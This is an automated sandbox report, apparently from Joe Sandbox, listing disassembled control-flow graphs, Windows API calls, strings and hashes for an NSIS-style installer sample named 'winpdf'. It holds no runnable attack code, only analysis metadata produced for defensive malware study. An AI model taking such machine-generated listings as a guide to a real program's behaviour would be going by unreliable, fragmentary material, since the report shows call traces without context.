                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                • API String ID: 608394941-1650083594
                                                                                                                                                                • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,%SenSurvival%,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,%SenSurvival%,%SenSurvival%,00000000,00000000,%SenSurvival%,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                • String ID: %SenSurvival%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                • API String ID: 4286501637-2098909761
                                                                                                                                                                • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 592 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 595 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 592->595 596 4035d7-4035dc 592->596 604 403615 595->604 605 4036fc-40370a call 4032d2 595->605 597 4037b6-4037ba 596->597 607 40361a-403631 604->607 611 403710-403713 605->611 612 4037c5-4037ca 605->612 609 403633 607->609 610 403635-403637 call 403336 607->610 609->610 616 40363c-40363e 610->616 614 403715-40372d call 403368 call 403336 611->614 615 40373f-403769 GlobalAlloc call 403368 call 40337f 611->615 612->597 614->612 642 403733-403739 614->642 615->612 641 40376b-40377c 615->641 619 403644-40364b 616->619 620 4037bd-4037c4 call 4032d2 616->620 624 4036c7-4036cb 619->624 625 40364d-403661 call 405e0c 619->625 620->612 629 4036d5-4036db 624->629 630 4036cd-4036d4 call 4032d2 624->630 625->629 639 403663-40366a 625->639 632 4036ea-4036f4 629->632 633 4036dd-4036e7 call 407281 629->633 630->629 632->607 640 4036fa 632->640 633->632 639->629 645 40366c-403673 639->645 640->605 646 403784-403787 641->646 647 40377e 641->647 642->612 642->615 645->629 648 403675-40367c 645->648 649 40378a-403792 646->649 647->646 648->629 650 40367e-403685 648->650 649->649 651 403794-4037af SetFilePointer call 405e0c 649->651 650->629 652 403687-4036a7 650->652 655 4037b4 651->655 652->612 654 4036ad-4036b1 652->654 656 4036b3-4036b7 654->656 657 4036b9-4036c1 654->657 655->597 656->640 656->657 657->629 658 4036c3-4036c5 657->658 658->629
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                Strings
                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                • Error launching installer, xrefs: 004035D7
                                                                                                                                                                • Inst, xrefs: 0040366C
                                                                                                                                                                • Null, xrefs: 0040367E
                                                                                                                                                                • soft, xrefs: 00403675
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 659 40337f-403396 660 403398 659->660 661 40339f-4033a7 659->661 660->661 662 4033a9 661->662 663 4033ae-4033b3 661->663 662->663 664 4033c3-4033d0 call 403336 663->664 665 4033b5-4033be call 403368 663->665 669 4033d2 664->669 670 4033da-4033e1 664->670 665->664 673 4033d4-4033d5 669->673 671 4033e7-403407 GetTickCount call 4072f2 670->671 672 403518-40351a 670->672 683 403536 671->683 685 40340d-403415 671->685 674 40351c-40351f 672->674 675 40357f-403583 672->675 676 403539-40353d 673->676 678 403521 674->678 679 403524-40352d call 403336 674->679 680 403540-403546 675->680 681 403585 675->681 678->679 679->669 692 403533 679->692 686 403548 680->686 687 40354b-403559 call 403336 680->687 681->683 683->676 689 403417 685->689 690 40341a-403428 call 403336 685->690 686->687 687->669 696 40355f-403572 WriteFile 687->696 689->690 690->669 697 40342a-403433 690->697 692->683 698 403511-403513 696->698 699 403574-403577 696->699 700 403439-403456 call 407312 697->700 698->673 699->698 701 403579-40357c 699->701 704 40350a-40350c 700->704 705 40345c-403473 GetTickCount 700->705 701->675 704->673 706 403475-40347d 705->706 707 4034be-4034c2 705->707 710 403485-4034b6 MulDiv wsprintfW call 404f72 706->710 711 40347f-403483 706->711 708 4034c4-4034c7 707->708 709 4034ff-403502 707->709 713 4034e7-4034ed 708->713 714 4034c9-4034db WriteFile 708->714 709->685 715 403508 709->715 716 4034bb 710->716 711->707 711->710 718 4034f3-4034f7 713->718 714->698 717 4034dd-4034e0 714->717 715->683 716->707 717->698 719 4034e2-4034e5 717->719 718->700 720 4034fd 718->720 719->718 720->683
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                • API String ID: 651206458-1535804072
                                                                                                                                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 721 404f72-404f85 722 405042-405044 721->722 723 404f8b-404f9e 721->723 724 404fa0-404fa4 call 406805 723->724 725 404fa9-404fb5 lstrlenW 723->725 724->725 727 404fd2-404fd6 725->727 728 404fb7-404fc7 lstrlenW 725->728 731 404fe5-404fe9 727->731 732 404fd8-404fdf SetWindowTextW 727->732 729 405040-405041 728->729 730 404fc9-404fcd lstrcatW 728->730 729->722 730->727 733 404feb-40502d SendMessageW * 3 731->733 734 40502f-405031 731->734 732->731 733->734 734->729 735 405033-405038 734->735 735->729
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 2740478559-2810827130
                                                                                                                                                                • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 736 401eb9-401ec4 737 401f24-401f26 736->737 738 401ec6-401ec9 736->738 739 401f53-401f7b GlobalAlloc call 406805 737->739 740 401f28-401f2a 737->740 741 401ed5-401ee3 call 4062a3 738->741 742 401ecb-401ecf 738->742 757 4030e3-4030f2 739->757 758 402387-40238d GlobalFree 739->758 743 401f3c-401f4e call 406009 740->743 744 401f2c-401f36 call 4062a3 740->744 754 401ee4-402702 call 406805 741->754 742->738 745 401ed1-401ed3 742->745 743->758 744->743 745->741 749 401ef7-402e50 call 406009 * 3 745->749 749->757 769 402708-40270e 754->769 758->757 769->757
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                • GlobalFree.KERNELBASE(0065BCA8), ref: 00402387
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                • String ID: %SenSurvival%$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                • API String ID: 1459762280-4218073349
                                                                                                                                                                • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 771 4022fd-402325 call 40145c GetFileVersionInfoSizeW 774 4030e3-4030f2 771->774 775 40232b-402339 GlobalAlloc 771->775 775->774 776 40233f-40234e GetFileVersionInfoW 775->776 778 402350-402367 VerQueryValueW 776->778 779 402384-40238d GlobalFree 776->779 778->779 781 402369-402381 call 405f51 * 2 778->781 779->774 781->779
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                • GlobalFree.KERNELBASE(0065BCA8), ref: 00402387
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 787 402b23-402b37 GlobalAlloc 788 402b39-402b49 call 401446 787->788 789 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 787->789 794 402b70-402b73 788->794 789->794 795 402b93 794->795 796 402b75-402b8d call 405f6a WriteFile 794->796 798 4030e3-4030f2 795->798 796->795 801 402384-40238d GlobalFree 796->801 801->798
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 804 402713-40273b call 406009 * 2 809 402746-402749 804->809 810 40273d-402743 call 40145c 804->810 812 402755-402758 809->812 813 40274b-402752 call 40145c 809->813 810->809 816 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 812->816 817 40275a-402761 call 40145c 812->817 813->812 817->816
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
